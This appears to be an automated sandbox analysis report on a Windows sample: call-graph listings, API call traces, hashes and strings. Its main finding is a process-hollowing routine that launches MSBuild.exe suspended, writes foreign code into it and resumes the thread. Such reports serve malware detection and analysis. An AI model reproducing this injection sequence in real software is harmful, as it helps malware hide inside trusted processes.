14843 2de57f __strnicoll MultiByteToWideChar 14847 2ea35c 14843->14847 14844->14845 14844->14850 14845->14843 14845->14850 14846 2ea4ae 14848 2d54a7 __freea 14 API calls 14846->14848 14847->14846 14849 2de531 __strnicoll 15 API calls 14847->14849 14847->14850 14851 2ea383 __alloca_probe_16 14847->14851 14848->14850 14849->14851 14850->14839 14850->14842 14851->14846 14852 2de57f __strnicoll MultiByteToWideChar 14851->14852 14853 2ea3cf 14852->14853 14853->14846 14854 2de57f __strnicoll MultiByteToWideChar 14853->14854 14855 2ea3eb 14854->14855 14855->14846 14856 2ea3f9 14855->14856 14857 2ea45c 14856->14857 14859 2de531 __strnicoll 15 API calls 14856->14859 14862 2ea412 __alloca_probe_16 14856->14862 14858 2d54a7 __freea 14 API calls 14857->14858 14860 2ea462 14858->14860 14859->14862 14861 2d54a7 __freea 14 API calls 14860->14861 14861->14850 14862->14857 14863 2de57f __strnicoll MultiByteToWideChar 14862->14863 14864 2ea455 14863->14864 14864->14857 14865 2ea47e 14864->14865 14871 2df06c 14865->14871 14868 2d54a7 __freea 14 API calls 14869 2ea49e 14868->14869 14870 2d54a7 __freea 14 API calls 14869->14870 14870->14850 14872 2df5d3 std::_Lockit::_Lockit 5 API calls 14871->14872 14873 2df077 14872->14873 14874 2df3b6 __strnicoll 5 API calls 14873->14874 14876 2df07d 14873->14876 14875 2df0bd CompareStringW 14874->14875 14875->14876 14876->14868 14878 2e960f 14877->14878 14879 2e9624 HeapSize 14877->14879 14880 2dad6d __strnicoll 14 API calls 14878->14880 14879->14742 14881 2e9614 14880->14881 14882 2db458 __strnicoll 29 API calls 14881->14882 14883 2e961f 14882->14883 14883->14742 14885 2e7589 14884->14885 14886 2e7594 14884->14886 14888 2de531 __strnicoll 15 API calls 14885->14888 14887 2e759c 14886->14887 14894 2e75a5 __strnicoll 14886->14894 14889 2de4f7 ___free_lconv_mon 14 API calls 14887->14889 14892 2e7591 14888->14892 14889->14892 14890 2e75cf HeapReAlloc 14890->14892 14890->14894 14891 2e75aa 14893 2dad6d __strnicoll 14 API calls 14891->14893 14892->14746 14893->14892 14894->14890 14894->14891 14895 2d8f08 codecvt 2 API calls 14894->14895 14895->14894 14897 2d7e1a __strnicoll 39 API calls 14896->14897 14898 2df7da 14897->14898 14899 2df7ec 14898->14899 14904 2df04d 14898->14904 14901 2d7f14 14899->14901 14907 2d7f6c 14901->14907 14905 2df5b9 std::_Lockit::_Lockit 5 API calls 14904->14905 14906 2df055 14905->14906 14906->14899 14908 2d7f7a 14907->14908 14909 2d7f94 14907->14909 14925 2d7efa 14908->14925 14910 2d7f9b 14909->14910 14911 2d7fba 14909->14911 14914 2d7f2c 14910->14914 14929 2d7ebb 14910->14929 14913 2de57f __strnicoll MultiByteToWideChar 14911->14913 14918 2d7fc9 14913->14918 14914->14752 14914->14753 14916 2d7fd0 GetLastError 14934 2dad93 14916->14934 14918->14916 14919 2d7ff6 14918->14919 14922 2d7ebb 15 API calls 14918->14922 14919->14914 14920 2de57f __strnicoll MultiByteToWideChar 14919->14920 14923 2d800d 14920->14923 14922->14919 14923->14914 14923->14916 14924 2dad6d __strnicoll 14 API calls 14924->14914 14926 2d7f05 14925->14926 14927 2d7f0d 14925->14927 14928 2de4f7 ___free_lconv_mon 14 API calls 14926->14928 14927->14914 14928->14927 14930 2d7efa 14 API calls 14929->14930 14931 2d7ec9 14930->14931 14939 2d7e9c 14931->14939 14942 2dad80 14934->14942 14936 2dad9e __dosmaperr 14937 2dad6d __strnicoll 14 API calls 14936->14937 14938 2d7fdc 14937->14938 14938->14924 14940 2de531 __strnicoll 15 API calls 14939->14940 14941 2d7ea9 14940->14941 14941->14914 14943 2de8d4 __strnicoll 14 API calls 14942->14943 14944 2dad85 14943->14944 14944->14936 14946 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14945->14946 14947 2d58ca 14946->14947 14947->14286 14949 2d8d4e 14948->14949 14958 2d8d5f 14948->14958 14950 2d4fcd CallUnexpected GetModuleHandleW 14949->14950 14953 2d8d53 14950->14953 14953->14958 14959 2d8c55 GetModuleHandleExW 14953->14959 14954 2d8c0d 14954->14257 14964 2d8ebb 14958->14964 14960 2d8ca8 14959->14960 14961 2d8c94 GetProcAddress 14959->14961 14962 2d8cbb FreeLibrary 14960->14962 14963 2d8cc4 14960->14963 14961->14960 14962->14963 14963->14958 14965 2d8ec7 ___scrt_is_nonwritable_in_current_image 14964->14965 14979 2db750 EnterCriticalSection 14965->14979 14967 2d8ed1 14980 2d8db8 14967->14980 14969 2d8ede 14984 2d8efc 14969->14984 14972 2d8cf0 15009 2d8cd7 14972->15009 14974 2d8cfa 14975 2d8d0e 14974->14975 14976 2d8cfe GetCurrentProcess TerminateProcess 14974->14976 14977 2d8c55 CallUnexpected 3 API calls 14975->14977 14976->14975 14978 2d8d16 ExitProcess 14977->14978 14979->14967 14981 2d8dc4 ___scrt_is_nonwritable_in_current_image CallUnexpected 14980->14981 14983 2d8e28 CallUnexpected 14981->14983 14987 2daa87 14981->14987 14983->14969 15008 2db767 LeaveCriticalSection 14984->15008 14986 2d8d97 14986->14954 14986->14972 14988 2daa93 __EH_prolog3 14987->14988 14991 2dad12 14988->14991 14990 2daaba codecvt 14990->14983 14992 2dad1e ___scrt_is_nonwritable_in_current_image 14991->14992 14999 2db750 EnterCriticalSection 14992->14999 14994 2dad2c 15000 2dabdd 14994->15000 14999->14994 15001 2dabfc 15000->15001 15002 2dabf4 15000->15002 15001->15002 15003 2de4f7 ___free_lconv_mon 14 API calls 15001->15003 15004 2dad61 15002->15004 15003->15002 15007 2db767 LeaveCriticalSection 15004->15007 15006 2dad4a 15006->14990 15007->15006 15008->14986 15012 2e0f55 15009->15012 15011 2d8cdc CallUnexpected 15011->14974 15013 2e0f64 CallUnexpected 15012->15013 15014 2e0f71 15013->15014 15016 2df3e7 15013->15016 15014->15011 15017 2df534 std::_Lockit::_Lockit 5 API calls 15016->15017 15018 2df403 15017->15018 15018->15014 15020 2d8697 15019->15020 15022 2d86a9 ___scrt_uninitialize_crt 15019->15022 15021 2d86a5 15020->15021 15024 2dbbb9 15020->15024 15021->14294 15022->14294 15027 2dbce4 15024->15027 15030 2dbdbd 15027->15030 15031 2dbdc9 ___scrt_is_nonwritable_in_current_image 15030->15031 15038 2db750 EnterCriticalSection 15031->15038 15033 2dbdd3 ___scrt_uninitialize_crt 15034 2dbe3f 15033->15034 15039 2dbd31 15033->15039 15047 2dbe5d 15034->15047 15038->15033 15040 2dbd3d ___scrt_is_nonwritable_in_current_image 15039->15040 15050 2d875f EnterCriticalSection 15040->15050 15042 2dbd80 15062 2dbdb1 15042->15062 15043 2dbd47 ___scrt_uninitialize_crt 15043->15042 15051 2dbbc2 15043->15051 15107 2db767 LeaveCriticalSection 15047->15107 15049 2dbbc0 15049->15021 15050->15043 15052 2dbbd7 _Fputc 15051->15052 15053 2dbbde 15052->15053 15054 2dbbe9 15052->15054 15056 2dbce4 ___scrt_uninitialize_crt 68 API calls 15053->15056 15055 2dbc27 ___scrt_uninitialize_crt 64 API calls 15054->15055 15057 2dbbf3 15055->15057 15059 2dbbe4 _Fputc 15056->15059 15058 2e0efc _Fputc 29 API calls 15057->15058 15057->15059 15060 2dbc0a 15058->15060 15059->15042 15065 2e5164 15060->15065 15106 2d8773 LeaveCriticalSection 15062->15106 15064 2dbd9f 15064->15033 15066 2e5175 15065->15066 15067 2e5182 15065->15067 15068 2dad6d __strnicoll 14 API calls 15066->15068 15069 2e51cb 15067->15069 15073 2e51a9 15067->15073 15071 2e517a 15068->15071 15070 2dad6d __strnicoll 14 API calls 15069->15070 15072 2e51d0 15070->15072 15071->15059 15075 2db458 __strnicoll 29 API calls 15072->15075 15076 2e51e1 15073->15076 15075->15071 15077 2e51ed ___scrt_is_nonwritable_in_current_image 15076->15077 15089 2e4ef9 EnterCriticalSection 15077->15089 15079 2e51fc 15087 2e5241 15079->15087 15090 2e4cb0 15079->15090 15081 2dad6d __strnicoll 14 API calls 15083 2e5248 15081->15083 15082 2e5228 FlushFileBuffers 15082->15083 15084 2e5234 GetLastError 15082->15084 15103 2e5277 15083->15103 15085 2dad80 __dosmaperr 14 API calls 15084->15085 15085->15087 15087->15081 15089->15079 15091 2e4cbd 15090->15091 15092 2e4cd2 15090->15092 15093 2dad80 __dosmaperr 14 API calls 15091->15093 15095 2dad80 __dosmaperr 14 API calls 15092->15095 15097 2e4cf7 15092->15097 15094 2e4cc2 15093->15094 15096 2dad6d __strnicoll 14 API calls 15094->15096 15098 2e4d02 15095->15098 15099 2e4cca 15096->15099 15097->15082 15100 2dad6d __strnicoll 14 API calls 15098->15100 15099->15082 15101 2e4d0a 15100->15101 15102 2db458 __strnicoll 29 API calls 15101->15102 15102->15099 15104 2e4f1c __fread_nolock LeaveCriticalSection 15103->15104 15105 2e5260 15104->15105 15105->15071 15106->15064 15107->15049

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,002F5110,002F5100), ref: 002F5334
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 002F5347
                                                                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 002F5365
                                                                                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(00000088,?,002F5154,00000004,00000000), ref: 002F5389
                                                                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 002F53B4
                                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 002F540C
                                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 002F5457
                                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 002F5495
                                                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(0000008C,00900000), ref: 002F54D1
                                                                                                                                                                                                                                                              • ResumeThread.KERNELBASE(0000008C), ref: 002F54E0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                              • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                                              • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                              • Instruction ID: b6ef68fd5f6465667f7221b685d1833b79fdfc222238c36e0ecfba5835c0eff0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6B10B7260064AAFDB60CF58CC80BEAB3A5FF88754F158164EA0CAB341D774FA51CB94

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002D1098: _strlen.LIBCMT ref: 002D10F9
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE ref: 002D1675
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 002D1685
                                                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 002D16AB
                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 002D16BA
                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 002D1705
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 002D1805
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2911764282-0
                                                                                                                                                                                                                                                              • Opcode ID: cc5004796b81a1f30d3fd0cab8e799599578bbf0f6e651e570c4cc6a16796664
                                                                                                                                                                                                                                                              • Instruction ID: 8336372aad57feadc7f386190080dd87388b1787f92b76bf15d4042458a3f81a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc5004796b81a1f30d3fd0cab8e799599578bbf0f6e651e570c4cc6a16796664
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89510FB1918341ABE300EF24DC88B2AB7E9FF94314F144A2EF48993751E7349D64CB52

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002D1098: _strlen.LIBCMT ref: 002D10F9
                                                                                                                                                                                                                                                              • FreeConsole.KERNELBASE ref: 002D158B
                                                                                                                                                                                                                                                                • Part of subcall function 002D123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 002D12C7
                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(002F5011,00000549,00000040,?), ref: 002D15D7
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 002D160E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2898289550-0
                                                                                                                                                                                                                                                              • Opcode ID: afe8abb99ee825e65f8d57ec6d23a1605076753d9f98e498919d45d4860303e6
                                                                                                                                                                                                                                                              • Instruction ID: 050fc07298f2f3b15f4a0ff2ed06d8b9b4241695dde8b5e84d1a12f63847eee3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afe8abb99ee825e65f8d57ec6d23a1605076753d9f98e498919d45d4860303e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB11EB71A101187BE700BB65EC46BBFB778EF84750F50403AFA04A7381E9755D218BD1

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 94 2d123b-2d1261 95 2d1263-2d127c 94->95 95->95 96 2d127e-2d1280 95->96 97 2d1282-2d12ac 96->97 97->97 98 2d12ae-2d12b6 97->98 99 2d12bc-2d12c0 98->99 100 2d1355-2d136d call 2d29c6 98->100 101 2d12c2-2d12df KiUserExceptionDispatcher 99->101 103 2d12fc-2d134f 101->103 104 2d12e1-2d12eb call 2d136e 101->104 103->100 103->101 107 2d12f0-2d12f9 call 2d1533 104->107 107->103
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 002D12C7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                              • String ID: [+]
                                                                                                                                                                                                                                                              • API String ID: 6842923-4228040803
                                                                                                                                                                                                                                                              • Opcode ID: a8da5d2f3f0dbddec01e81cc73ae80a50ca24363b3980d88294df7f3c447f982
                                                                                                                                                                                                                                                              • Instruction ID: f0847e6782082f9e19e90859e139977b208915a3d841f73a7c04788b18f299ff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8da5d2f3f0dbddec01e81cc73ae80a50ca24363b3980d88294df7f3c447f982
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F131273151C3D05BD712AB3468997FBBBD0ABBD318F18057DD8C987343C2615855CB62

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 110 2e5283-2e52a5 111 2e52ab-2e52ad 110->111 112 2e5498 110->112 113 2e52af-2e52ce call 2db601 111->113 114 2e52d9-2e52fc 111->114 115 2e549a-2e549e 112->115 121 2e52d1-2e52d4 113->121 117 2e52fe-2e5300 114->117 118 2e5302-2e5308 114->118 117->118 120 2e530a-2e531b 117->120 118->113 118->120 122 2e532e-2e533e call 2e55b0 120->122 123 2e531d-2e532b call 2e4033 120->123 121->115 128 2e5387-2e5399 122->128 129 2e5340-2e5346 122->129 123->122 132 2e539b-2e53a1 128->132 133 2e53f0-2e5410 WriteFile 128->133 130 2e536f-2e5385 call 2e562d 129->130 131 2e5348-2e534b 129->131 153 2e5368-2e536a 130->153 136 2e534d-2e5350 131->136 137 2e5356-2e5365 call 2e59f4 131->137 134 2e53dc-2e53e9 call 2e5a5c 132->134 135 2e53a3-2e53a6 132->135 139 2e541b 133->139 140 2e5412-2e5418 GetLastError 133->140 152 2e53ee 134->152 141 2e53c8-2e53da call 2e5c20 135->141 142 2e53a8-2e53ab 135->142 136->137 143 2e5430-2e5433 136->143 137->153 147 2e541e-2e5429 139->147 140->139 160 2e53c3-2e53c6 141->160 148 2e5436-2e5438 142->148 149 2e53b1-2e53be call 2e5b37 142->149 143->148 154 2e542b-2e542e 147->154 155 2e5493-2e5496 147->155 156 2e543a-2e543f 148->156 157 2e5466-2e5472 148->157 149->160 152->160 153->147 154->143 155->115 161 2e5458-2e5461 call 2dadf9 156->161 162 2e5441-2e5453 156->162 163 2e547c-2e548e 157->163 164 2e5474-2e547a 157->164 160->153 161->121 162->121 163->121 164->112 164->163
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002E562D: GetConsoleOutputCP.KERNEL32(865659BE,00000000,00000000,?), ref: 002E5690
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,002DBBF3,?), ref: 002E5408
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,002DBBF3,?,002DBE37,00000000,?,00000000,002DBE37,?,?,?,002F4628,0000002C,002DBD23,?), ref: 002E5412
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2915228174-0
                                                                                                                                                                                                                                                              • Opcode ID: d0a34178d75fe4be09006f4ae008cec36a9e048fdc436c6fedc3b0f5aa54a3c8
                                                                                                                                                                                                                                                              • Instruction ID: 1fc4e4c68dedfde67a634f06574e0642d151d26425645470a3a874b7d34d4281
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0a34178d75fe4be09006f4ae008cec36a9e048fdc436c6fedc3b0f5aa54a3c8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D361F671C705AAAFDF11CFA9D844EEEBBB9BF09348F940195E900A7242C371C961CB60

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 167 2e5a5c-2e5ab1 call 2d56e0 170 2e5b26-2e5b36 call 2d29c6 167->170 171 2e5ab3 167->171 173 2e5ab9 171->173 175 2e5abf-2e5ac1 173->175 176 2e5adb-2e5b00 WriteFile 175->176 177 2e5ac3-2e5ac8 175->177 180 2e5b1e-2e5b24 GetLastError 176->180 181 2e5b02-2e5b0d 176->181 178 2e5aca-2e5ad0 177->178 179 2e5ad1-2e5ad9 177->179 178->179 179->175 179->176 180->170 181->170 182 2e5b0f-2e5b1a 181->182 182->173 183 2e5b1c 182->183 183->170
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,002E53EE,00000000,002DBE37,?,00000000,?,00000000), ref: 002E5AF8
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,002E53EE,00000000,002DBE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,002DBBF3), ref: 002E5B1E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 442123175-0
                                                                                                                                                                                                                                                              • Opcode ID: dfac67594e4b22bb9da98d903ef9aa2f9c75df2e06a5e90085e35a9b0280ea58
                                                                                                                                                                                                                                                              • Instruction ID: 77a4c04c5129b1b466954c242c59f375ca655c2f30db8b0f00bf527247dfbb05
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfac67594e4b22bb9da98d903ef9aa2f9c75df2e06a5e90085e35a9b0280ea58
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9121D030A202298FCB15CF2ADD80AE9B7B9EB48309F6441A9E906D7311D730DE42CF60

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
